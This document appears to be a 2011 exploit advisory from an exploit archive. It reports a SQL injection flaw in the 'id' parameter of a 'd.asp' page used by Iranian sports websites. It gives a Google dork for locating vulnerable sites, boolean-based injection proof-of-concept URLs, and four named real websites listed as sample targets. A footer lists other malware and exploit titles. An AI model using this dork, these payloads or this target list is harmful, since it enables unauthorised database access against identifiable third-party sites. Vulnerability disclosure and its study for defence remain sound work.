Iran Sports Network SQL Injection

Posted on 22 December 2011

############################### HUT CNIS ############################# # Exploit Title: Iran sports network SQL INJECTION Vulnerability # Date: [2011/10/19] # Author: S.Azadi # Google Dork: inurl:d.asp site:.ir # Vulnerability Type: SQL Injection # Version: All version #--------------------------------------------------------------------- Technical Details: - SQL INJECTION: There is a SQLI vulnerability on “d.asp” page and parameter “id”. http://sitename/d.asp?id=[SQLI] PoC: http://sitename/d.asp?id=25928 and 1=0;-- http://sitename/d.asp?id=25928 and 1=1;-- sample: http://www.irantriathlon.ir/d.asp?id=25928’ http://www.sporttehran.ir/d.asp?id=25921’ http://www.chesstehran.ir/d.asp?id=26403’ http://www.blindsports.ir/d.asp?id=25862’ # # # ###########-HUT Center for Network and Information Security-################

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Zope 5.9 Command Injection
SAP Cloud Connector 2.16.1 Missing Validation
Cacti 1.2.26 Remote Code Execution
Prison Management System Using PHP SQL Injection
Leafpub 1.1.9 Cross Site Scripting

Last 20